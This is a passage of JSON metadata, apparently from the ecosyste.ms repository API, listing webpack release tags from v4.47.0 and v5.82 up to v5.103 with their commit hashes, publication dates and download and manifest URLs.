pack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a